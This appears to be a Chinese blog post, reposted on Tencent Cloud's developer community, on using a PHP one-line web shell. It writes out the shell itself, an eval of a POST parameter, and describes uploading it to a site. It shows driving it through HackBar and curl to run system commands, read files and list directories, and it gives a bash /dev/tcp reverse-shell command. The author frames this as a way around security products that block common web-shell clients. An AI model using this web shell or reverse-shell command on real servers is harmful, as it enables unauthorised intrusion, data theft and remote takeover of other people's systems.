前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >PHP一句话木马使用技巧

PHP一句话木马使用技巧

作者头像
全栈程序员站长
发布2022-08-31 18:02:37
2.2K0
发布2022-08-31 18:02:37
举报

大家好,又见面了,我是你们的朋友全栈君。

近来发现好多网站有安全狗,会拦截菜刀和蚁剑,因此总结下通过浏览器直接调用一句话木马的姿势。

PHP一句话:<?php @eval($_POST[‘shy’]);?>

firefox浏览器:hackbar

命令提示符:curl

首先上传一句话木马到网站目录,可以是虚拟机也可以是VPS,我这里用的是阿里云我自己搭建的网站,

由于只是简单的一句话木马,因次一上车就收到了安全云的短信安全提示,正好可以用来测试免杀一句话,免得以后测试刚上传就被发现了。

利用hackbar链接木马

利用system();执行系统命令

PHP一句话木马使用技巧
PHP一句话木马使用技巧
PHP一句话木马使用技巧
PHP一句话木马使用技巧

利用file_get_contents进行文件读取,然后用echo,或print打印出这个字符串。file_get_contents是将文件内容读入到一个字符串当中。

PHP一句话木马使用技巧
PHP一句话木马使用技巧
PHP一句话木马使用技巧
PHP一句话木马使用技巧

file_get_contents还可以替换成其他的函数

反弹shell,最重要的是记得进行url编码,不然会失败的

反射shell的语句有很多,这里是用的是最简单的bash -i >& /dev/tcp/ip/post 0>&1

PHP一句话木马使用技巧
PHP一句话木马使用技巧

PHP一句话木马使用技巧
PHP一句话木马使用技巧

利用curl链接一句话木马

基本上跟上面一样,curl参数-X post 指定http方法为post –data 后面跟post的内容

PHP一句话木马使用技巧
PHP一句话木马使用技巧

scandir() 函数返回指定目录中的文件和目录的数组

PHP一句话木马使用技巧
PHP一句话木马使用技巧
PHP一句话木马使用技巧
PHP一句话木马使用技巧
PHP一句话木马使用技巧
PHP一句话木马使用技巧

反弹shell,也要经过编码才能反弹成功

PHP一句话木马使用技巧
PHP一句话木马使用技巧

总之,编码真的很重要。

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/143646.html原文链接:https://javaforall.cn

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2022年5月2,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 利用hackbar链接木马
  • 利用curl链接一句话木马
相关产品与服务
命令行工具
腾讯云命令行工具 TCCLI 是管理腾讯云资源的统一工具。使用腾讯云命令行工具,您可以快速调用腾讯云 API 来管理您的腾讯云资源。此外,您还可以基于腾讯云的命令行工具来做自动化和脚本处理,以更多样的方式进行组合和重用。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档